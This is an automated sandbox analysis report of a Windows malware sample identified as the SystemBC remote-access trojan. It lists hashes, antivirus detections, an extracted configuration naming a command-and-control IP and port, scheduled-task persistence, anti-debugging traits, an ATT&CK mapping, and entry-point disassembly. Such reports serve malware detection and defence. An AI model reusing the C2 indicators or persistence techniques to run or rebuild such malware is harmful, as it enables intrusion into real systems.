Play interactive tour

Edit tour

Windows Analysis Report ZDqKJkJ1Sb

Overview

General Information

Sample Name:	ZDqKJkJ1Sb (renamed file extension from none to exe)
Analysis ID:	492690
MD5:	1d29d6cd39010976adcb9fcba517f3bc
SHA1:	86d13d8593d4eea9e5b8c9dca9a1d30c7c03f67c
SHA256:	c27741b9e50da0c369b848179c9a4f9b0362b6d5e384055c6c72fc9667a270ec
Tags:	32exetrojan
Infos:
Most interesting Screenshot:

Detection

SystemBC

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected SystemBC

Multi AV Scanner detection for submitted file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

C2 URLs / IPs found in malware configuration

Creates a DirectInput object (often for capturing keystrokes)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

PE file contains strange resources

Contains functionality to read the PEB

May sleep (evasive loops) to hinder dynamic analysis

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Internet Provider seen in connection with other malware

Creates job files (autostart)

Contains functionality for execution timing, often used to detect debuggers

Classification

Process Tree

System is w10x64

ZDqKJkJ1Sb.exe (PID: 3528 cmdline: 'C:\Users\user\Desktop\ZDqKJkJ1Sb.exe' MD5: 1D29D6CD39010976ADCB9FCBA517F3BC)

ZDqKJkJ1Sb.exe (PID: 5916 cmdline: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe start MD5: 1D29D6CD39010976ADCB9FCBA517F3BC)

cleanup

Malware Configuration

Threatname: SystemBC

{"HOST1": "195.2.76.80", "HOST2": "195.2.76.80", "PORT1": "4001", "TOR": ""}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: ZDqKJkJ1Sb.exe PID: 3528	JoeSecurity_SystemBC	Yara detected SystemBC	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0.3.ZDqKJkJ1Sb.exe.740000.0.raw.unpack

Malware Configuration Extractor: SystemBC {"HOST1": "195.2.76.80", "HOST2": "195.2.76.80", "PORT1": "4001", "TOR": ""}

Multi AV Scanner detection for submitted file

Show sources

Source: ZDqKJkJ1Sb.exe	Virustotal: Detection: 40%			Perma Link
Source: ZDqKJkJ1Sb.exe	ReversingLabs: Detection: 81%

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe	Unpacked PE file: 0.2.ZDqKJkJ1Sb.exe.400000.0.unpack
Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe	Unpacked PE file: 5.2.ZDqKJkJ1Sb.exe.400000.0.unpack

Source: ZDqKJkJ1Sb.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: ZdIC:\vikofoyad_voguwoka\bowu\razu_tog\98 kifu42\kavuyuxayu\y.pdb source: ZDqKJkJ1Sb.exe
Source:	Binary string: C:\vikofoyad_voguwoka\bowu\razu_tog\98 kifu42\kavuyuxayu\y.pdb source: ZDqKJkJ1Sb.exe

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: 195.2.76.80
Source: Malware configuration extractor	URLs: 195.2.76.80

Source: global traffic

TCP traffic: 192.168.2.5:49737 -> 195.2.76.80:4001

Source: Joe Sandbox View

ASN Name: VDSINA-ASRU VDSINA-ASRU

Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.76.80
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.76.80
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.76.80
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.76.80

Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe

Code function: 0_2_00402A1E select,recv,

0_2_00402A1E

Source: ZDqKJkJ1Sb.exe, 00000000.00000002.263811427.000000000080A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: ZDqKJkJ1Sb.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: ZDqKJkJ1Sb.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ZDqKJkJ1Sb.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ZDqKJkJ1Sb.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ZDqKJkJ1Sb.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe

File created: C:\Windows\Tasks\wow64.job

Jump to behavior

Source: ZDqKJkJ1Sb.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: ZDqKJkJ1Sb.exe	Virustotal: Detection: 40%
Source: ZDqKJkJ1Sb.exe	ReversingLabs: Detection: 81%

Source: ZDqKJkJ1Sb.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe 'C:\Users\user\Desktop\ZDqKJkJ1Sb.exe'
Source: unknown	Process created: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe C:\Users\user\Desktop\ZDqKJkJ1Sb.exe start

Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe	Mutant created: \Sessions\1\BaseNamedObjects\wow64
Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe	Mutant created: \BaseNamedObjects\wow64

Source: classification engine

Classification label: mal84.troj.evad.winEXE@2/1@0/1

Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe

Code function: 0_2_004023E6 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_004023E6

Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: ZDqKJkJ1Sb.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: ZdIC:\vikofoyad_voguwoka\bowu\razu_tog\98 kifu42\kavuyuxayu\y.pdb source: ZDqKJkJ1Sb.exe
Source:	Binary string: C:\vikofoyad_voguwoka\bowu\razu_tog\98 kifu42\kavuyuxayu\y.pdb source: ZDqKJkJ1Sb.exe

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe	Unpacked PE file: 0.2.ZDqKJkJ1Sb.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe	Unpacked PE file: 5.2.ZDqKJkJ1Sb.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe	Unpacked PE file: 0.2.ZDqKJkJ1Sb.exe.400000.0.unpack
Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe	Unpacked PE file: 5.2.ZDqKJkJ1Sb.exe.400000.0.unpack

Source: initial sample

Static PE information: section name: .text entropy: 7.39136293995

Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe

File created: C:\Windows\Tasks\wow64.job

Jump to behavior

Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe TID: 4940

Thread sleep time: -60000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe

Code function: 0_2_00402D95 rdtsc

0_2_00402D95

Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: ZDqKJkJ1Sb.exe, 00000005.00000002.516337873.0000000000754000.00000004.00000001.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK

Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe	Code function: 0_2_00402E3C mov eax, dword ptr fs:[00000030h]	0_2_00402E3C
Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe	Code function: 0_2_0062092B mov eax, dword ptr fs:[00000030h]	0_2_0062092B
Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe	Code function: 0_2_0062308C mov eax, dword ptr fs:[00000030h]	0_2_0062308C
Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe	Code function: 0_2_00620D90 mov eax, dword ptr fs:[00000030h]	0_2_00620D90
Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe	Code function: 0_2_00817D1E push dword ptr fs:[00000030h]	0_2_00817D1E
Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe	Code function: 5_2_00402E3C mov eax, dword ptr fs:[00000030h]	5_2_00402E3C
Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe	Code function: 5_2_0072092B mov eax, dword ptr fs:[00000030h]	5_2_0072092B
Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe	Code function: 5_2_00720D90 mov eax, dword ptr fs:[00000030h]	5_2_00720D90
Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe	Code function: 5_2_0072308C mov eax, dword ptr fs:[00000030h]	5_2_0072308C
Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe	Code function: 5_2_0074F37E push dword ptr fs:[00000030h]	5_2_0074F37E

Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe

Code function: 0_2_00402D95 rdtsc

0_2_00402D95

Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe

Code function: 0_2_004020A8 CoInitialize,CoCreateInstance,GetUserNameExW,GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,CoUninitialize,

0_2_004020A8

Source: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe

Code function: 0_2_004020A8 CoInitialize,CoCreateInstance,GetUserNameExW,GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,CoUninitialize,

0_2_004020A8

Stealing of Sensitive Information:

Yara detected SystemBC

Show sources

Source: Yara match

File source: Process Memory Space: ZDqKJkJ1Sb.exe PID: 3528, type: MEMORYSTR

Remote Access Functionality:

Yara detected SystemBC

Show sources

Source: Yara match

File source: Process Memory Space: ZDqKJkJ1Sb.exe PID: 3528, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scheduled Task/Job1	Scheduled Task/Job1	Process Injection1	Masquerading1	Input Capture1	System Time Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Non-Standard Port1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Scheduled Task/Job1	Virtualization/Sandbox Evasion11	LSASS Memory	Security Software Discovery11	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection1	Security Account Manager	Virtualization/Sandbox Evasion11	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	Account Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing22	LSA Secrets	System Owner/User Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery12	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ZDqKJkJ1Sb.exe	41%	Virustotal		Browse
ZDqKJkJ1Sb.exe	81%	ReversingLabs	Win32.Trojan.Racealer

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
5.1.ZDqKJkJ1Sb.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.ZDqKJkJ1Sb.exe.620e50.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.3.ZDqKJkJ1Sb.exe.730000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.ZDqKJkJ1Sb.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1111611	Download File
0.2.ZDqKJkJ1Sb.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1111611	Download File
0.1.ZDqKJkJ1Sb.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.ZDqKJkJ1Sb.exe.720e50.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.3.ZDqKJkJ1Sb.exe.740000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
195.2.76.80	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
195.2.76.80	true	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
195.2.76.80	unknown	Russian Federation		48282	VDSINA-ASRU	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	492690
Start date:	28.09.2021
Start time:	22:54:44
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ZDqKJkJ1Sb (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.troj.evad.winEXE@2/1@0/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 32.8% (good quality ratio 32.1%) Quality average: 78.5% Quality standard deviation: 23.2%
HCA Information:	Successful, ratio: 67% Number of executed functions: 26 Number of non-executed functions: 33
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 13.107.5.88, 13.107.42.16, 20.199.120.182, 20.82.210.154, 20.199.120.85, 20.199.120.151, 40.112.88.60, 80.67.82.235, 80.67.82.211, 20.50.102.62 Excluded domains from analysis (whitelisted): client-office365-tas.msedge.net, ocos-office365-s2s.msedge.net, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, config-edge-skype.l-0007.l-msedge.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, l-0007.l-msedge.net, config.edge.skype.com, client.wns.windows.com, fs.microsoft.com, afdo-tas-offload.trafficmanager.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, l-0007.config.skype.com Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time	Type	Description
22:55:51	API Interceptor	2x Sleep call for process: ZDqKJkJ1Sb.exe modified
22:55:52	Task Scheduler	Run new task: wow64 path: C:\Users\user\Desktop\ZDqKJkJ1Sb.exe s>start

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
VDSINA-ASRU	Lwi4MGWNvX.exe	Get hash	malicious	Browse	195.2.93.217
	OWVLlKCnM7.exe	Get hash	malicious	Browse	95.142.47.68
	#U0413#U043e#U0441. #U0438#U043d#U0432#U0435#U0441#U0442#U0438#U0446#U0438#U0438 - 367642 .htm	Get hash	malicious	Browse	178.208.94.217
	5MUtE9kqX7.exe	Get hash	malicious	Browse	62.113.117.197
	fILYRYh4mk.exe	Get hash	malicious	Browse	94.103.94.214
	hFh4mJkr5d.exe	Get hash	malicious	Browse	185.209.30.177
	6iZab0rYOQ.exe	Get hash	malicious	Browse	185.209.30.177
	PO7532.exe	Get hash	malicious	Browse	178.208.83.38
	XB0SQoadK4.exe	Get hash	malicious	Browse	109.234.38.42
	modile Phone Bill.js	Get hash	malicious	Browse	195.2.92.62
	GimmerBot.exe	Get hash	malicious	Browse	195.2.75.10
	video.exe	Get hash	malicious	Browse	94.103.86.184
	HEWFj6cmsN.exe	Get hash	malicious	Browse	178.208.83.23
	wkJ6cREJOS.exe	Get hash	malicious	Browse	109.234.32.63
	09m5uwn6Wm.exe	Get hash	malicious	Browse	94.103.80.219
	EVSON49uVr.exe	Get hash	malicious	Browse	195.2.93.247
	eTHJDdbBie.exe	Get hash	malicious	Browse	185.209.30.177
	j2p2BI1bd2.exe	Get hash	malicious	Browse	94.103.83.88
	Ee0iNT99wg.exe	Get hash	malicious	Browse	109.234.32.63
	malo.js	Get hash	malicious	Browse	195.2.92.62

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Windows\Tasks\wow64.job Download File
Process:	C:\Users\user\Desktop\ZDqKJkJ1Sb.exe
File Type:	data
Category:	dropped
Size (bytes):	346
Entropy (8bit):	3.6694696941358136
Encrypted:	false
SSDEEP:	6:1IVIW/80p5ZsFWEutAtoADCzcF/v5t/uy0lPaNIVIW/80e/:1oIWOFa2+zcFaVPaNoIWS/
MD5:	92D2D14B3188A2285B9437F8A7D73CF1
SHA1:	0D0E09613E5AB353B6AA5E0EF8DF4614F7BF260A
SHA-256:	FAF528C06AFD4AD100BA7512AACAB556FC9A8231336F51065A7E85E74975F8F3
SHA-512:	D8CAD1743AE567F49C58E18CF02F1658ADFCFBE751F0FF9B774AE98F50015F61A1B428965DAEE397ACEAEF56BBD21979FCF4EC9E902AF7CCB08D49A2BBF05931
Malicious:	false
Reputation:	low
Preview:	.......A.0.F.....~F.......<... .....\.........."....................'.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.D.e.s.k.t.o.p.\.Z.D.q.K.J.k.J.1.S.b...e.x.e.....s.t.a.r.t.......D.E.S.K.T.O.P.-.7.1.6.T.7.7.1.\.a.l.f.o.n.s...................0.........I.......9. ..................................A.0.F.....~F.......<... .....\.........."..................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.554982997843071
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Clipper DOS Executable (2020/12) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	ZDqKJkJ1Sb.exe
File size:	120320
MD5:	1d29d6cd39010976adcb9fcba517f3bc
SHA1:	86d13d8593d4eea9e5b8c9dca9a1d30c7c03f67c
SHA256:	c27741b9e50da0c369b848179c9a4f9b0362b6d5e384055c6c72fc9667a270ec
SHA512:	fb332b210b5c8549097d55740d09ff06c9beabe40c2c020013e59f429df29c3b0cb7925de4eafb536b299361ea2b533c65a133ee6784e594574441ed04b09c48
SSDEEP:	1536:KWNxxYnM24WxbpPxwGOFJBszdNoyNA2kjh3uJp+Q7Jgz70xWAcfz:KqYsWY2zduyNA2kxqfPxjcfz
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L...H@._...

File Icon


Icon Hash:	e0e4e8beb0e4c8ea

Static PE Info

General
Entrypoint:	0x401b40
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x5FED4048 [Thu Dec 31 03:06:48 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	26b2a22c1afb78875d9384441bc03abe

Entrypoint Preview

Instruction
call 00007F48849A6198h
jmp 00007F48849A359Dh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
xor ecx, ecx
cmp eax, dword ptr [00413008h+ecx*8]
je 00007F48849A3735h
inc ecx
cmp ecx, 2Dh
jc 00007F48849A3713h
lea ecx, dword ptr [eax-13h]
cmp ecx, 11h
jnbe 00007F48849A3730h
push 0000000Dh
pop eax
pop ebp
ret
mov eax, dword ptr [0041300Ch+ecx*8]
pop ebp
ret
add eax, FFFFFF44h
push 0000000Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 08h
pop ebp
ret
call 00007F48849A5DFDh
test eax, eax
jne 00007F48849A3728h
mov eax, 00413170h
ret
add eax, 08h
ret
call 00007F48849A5DEAh
test eax, eax
jne 00007F48849A3728h
mov eax, 00413174h
ret
add eax, 0Ch
ret
mov edi, edi
push ebp
mov ebp, esp
push esi
call 00007F48849A3707h
mov ecx, dword ptr [ebp+08h]
push ecx
mov dword ptr [eax], ecx
call 00007F48849A36A7h
pop ecx
mov esi, eax
call 00007F48849A36E1h
mov dword ptr [eax], esi
pop esi
pop ebp
ret
push 0000000Ch
push 004116B8h
call 00007F48849A44ACh
mov ecx, dword ptr [ebp+08h]
xor edi, edi
cmp ecx, edi
jbe 00007F48849A3750h
push FFFFFFE0h
pop eax
xor edx, edx
div ecx
cmp eax, dword ptr [ebp+0Ch]
sbb eax, eax
inc eax
jne 00007F48849A3741h
call 00007F48849A36B3h
mov dword ptr [eax], 0000000Ch
push edi
push edi
push edi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x122a0	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x11a0c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x99000	0xa8f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0xf1d0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x10560	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xf000	0x180	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xd4a0	0xd600	False	0.760660046729	data	7.39136293995	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0xf000	0x32f0	0x3400	False	0.256159855769	data	4.10171806767	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x13000	0x8557c	0x1e00	False	0.11796875	data	1.31977280013	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x99000	0xa8f0	0xaa00	False	0.668841911765	data	6.06751171289	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x993f0	0xea8	data	English	United States
RT_ICON	0x9a298	0x8a8	data	English	United States
RT_ICON	0x9ab40	0x6c8	data	English	United States
RT_ICON	0x9b208	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x9b770	0x25a8	data	English	United States
RT_ICON	0x9dd18	0x10a8	data	English	United States
RT_ICON	0x9edc0	0x988	data	English	United States
RT_ICON	0x9f748	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x9fc28	0x6c8	data	English	United States
RT_ICON	0xa02f0	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0xa0858	0x25a8	data	English	United States
RT_ICON	0xa2e00	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_STRING	0xa34c8	0x424	data
RT_ACCELERATOR	0xa32a8	0x50	data
RT_ACCELERATOR	0xa32f8	0x20	data
RT_GROUP_ICON	0xa3268	0x3e	data	English	United States
RT_GROUP_ICON	0x9fbb0	0x76	data	English	United States
RT_VERSION	0xa3318	0x1b0	data

Imports

DLL

Import

KERNEL32.dll

HeapReAlloc, GetLocaleInfoA, LoadResource, InterlockedIncrement, GetEnvironmentStringsW, AddConsoleAliasW, SetEvent, GetSystemTimeAsFileTime, GetCommandLineA, WriteFileGather, CreateActCtxW, EnumResourceTypesA, LeaveCriticalSection, GetFileAttributesA, ReadFile, GetDevicePowerState, GetProcAddress, VerLanguageNameA, FreeUserPhysicalPages, WriteConsoleA, GetProcessId, LocalAlloc, RemoveDirectoryW, GlobalGetAtomNameW, WaitForMultipleObjects, GetModuleFileNameA, GetModuleHandleA, UpdateResourceW, EraseTape, GetStringTypeW, OpenSemaphoreW, ReleaseMutex, EndUpdateResourceA, LocalSize, FindFirstVolumeW, FindNextVolumeA, lstrcpyW, HeapAlloc, GetStartupInfoA, DeleteCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapCreate, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, GetFileType, GetLastError, SetFilePointer, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, InitializeCriticalSectionAndSpinCount, RtlUnwind, LoadLibraryA, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, CloseHandle, CreateFileA

USER32.dll

GetCursorPos

Exports

Name	Ordinal	Address
@SetViceVariants@12	1	0x401000

Version Infos

Description	Data
InternalName	sajbmiamezu.ise
ProductVersion	8.6.59.5
Copyright	Copyrighz (C) 2021, fudkagat
Translation	0x0127 0x0081

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2021 22:55:58.905354977 CEST	49737	4001	192.168.2.5	195.2.76.80
